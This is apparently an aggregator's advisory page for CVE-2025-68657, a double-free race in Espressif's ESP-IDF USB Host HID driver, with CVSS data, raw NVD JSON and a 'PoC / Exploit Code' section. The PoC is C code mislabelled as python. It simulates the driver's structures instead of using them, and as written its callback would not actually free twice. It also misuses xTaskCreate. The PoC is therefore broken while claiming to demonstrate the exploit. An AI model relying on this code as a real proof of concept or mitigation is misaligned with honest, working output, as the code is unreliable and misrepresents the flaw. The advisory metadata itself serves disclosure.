Security Vulnerability Report
中文
CVE-2025-68657 CVSS 6.4 MEDIUM

CVE-2025-68657

Published: 2026-01-12 18:15:49
Last Modified: 2026-01-22 15:47:27
Source: [email protected]

Description

Espressif ESP-IDF USB Host HID (Human Interface Device) Driver allows access to HID devices. Prior to 1.1.0, calls to hid_host_device_close() can free the same usb_transfer_t twice. The USB event callback and user code share the hid_iface_t state without locking, so both can tear down a READY interface simultaneously, corrupting heap metadata inside the ESP USB host stack. This vulnerability is fixed in 1.1.0.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:espressif:usb_host_hid_driver:*:*:*:*:*:*:*:* - VULNERABLE
Espressif ESP-IDF USB Host HID Driver < 1.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// PoC concept for CVE-2025-68657 // Demonstrates the double-free condition in ESP-IDF USB Host HID Driver #include "usb_host_hid.h" #include "freertos/FreeRTOS.h" #include "freertos/task.h" // Simulated usb_transfer_t structure typedef struct { void *buffer; size_t length; int ref_count; } usb_transfer_t; // Simulated hid_iface_t with race condition typedef struct { usb_transfer_t *transfer; uint8_t state; // 0=IDLE, 1=READY, 2=CLOSING TaskHandle_t user_task; } hid_iface_t; static hid_iface_t g_hid_iface; // Vulnerable function - double free when called simultaneously void hid_host_device_close(hid_iface_t *iface) { // Race condition: no lock protection if (iface->state == 1) { // READY state iface->state = 2; // CLOSING // First free - from user code path if (iface->transfer) { free(iface->transfer->buffer); free(iface->transfer); // First free iface->transfer = NULL; } iface->state = 0; } } // USB event callback - can trigger second free void IRAM_ATTR usb_event_callback(void *arg) { hid_iface_t *iface = (hid_iface_t *)arg; // Check state without atomic operation if (iface->state == 1) { // Callback path attempts to close hid_host_device_close(iface); // Second free! } } // PoC: Trigger race condition void poc_trigger(void *param) { // Setup HID interface g_hid_iface.transfer = malloc(sizeof(usb_transfer_t)); g_hid_iface.transfer->buffer = malloc(64); g_hid_iface.state = 1; // Create race: user code closes while USB event occurs TaskHandle_t task1, task2; xTaskCreate((TaskFunction_t)hid_host_device_close, "user_close", 2048, &g_hid_iface, 5, &task1); // Delay to synchronize with callback vTaskDelay(pdMS_TO_TICKS(1)); usb_event_callback(&g_hid_iface); // Trigger callback // Result: double-free, heap corruption } // Mitigation: Proper locking implementation void hid_host_device_close_safe(hid_iface_t *iface) { // mutex_lock(&iface->lock); // Add proper synchronization portENTER_CRITICAL(); if (iface->state == 1) { iface->state = 2; if (iface->transfer) { free(iface->transfer->buffer); free(iface->transfer); iface->transfer = NULL; } iface->state = 0; } portEXIT_CRITICAL(); // mutex_unlock(&iface->lock); }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68657", "sourceIdentifier": "[email protected]", "published": "2026-01-12T18:15:48.610", "lastModified": "2026-01-22T15:47:26.980", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Espressif ESP-IDF USB Host HID (Human Interface Device) Driver allows access to HID devices. Prior to 1.1.0, calls to hid_host_device_close() can free the same usb_transfer_t twice. The USB event callback and user code share the hid_iface_t state without locking, so both can tear down a READY interface simultaneously, corrupting heap metadata inside the ESP USB host stack. This vulnerability is fixed in 1.1.0."}, {"lang": "es", "value": "El controlador Espressif ESP-IDF USB Host HID (dispositivo de interfaz humana) permite el acceso a dispositivos HID. Antes de la versión 1.1.0, las llamadas a hid_host_device_close() pueden liberar la misma usb_transfer_t dos veces. La devolución de llamada de eventos USB y el código de usuario comparten el estado de hid_iface_t sin bloqueo, por lo que ambos pueden desmantelar una interfaz READY simultáneamente, corrompiendo los metadatos del heap dentro de la pila de host USB de ESP. Esta vulnerabilidad se corrige en la versión 1.1.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-415"}, {"lang": "en", "value": "CWE-667"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:espressif:usb_host_hid_driver:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.1.0", "matchCriteriaId": "139CC02D-BC53-4537-B250-9AD6B260F309"}]}]}], "references": [{"url": "https://components.espressif.com/components/espressif/usb_host_hid/versions/1.1.0/changelog", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/espressif/esp-usb/commit/cd28106e9f72ac2719682c06f94601f9f034390b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/espressif/esp-usb/security/advisories/GHSA-gp8r-qjfr-gqfv", "source": "[email protected]", "tags": ["Vendor Advisory", "Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.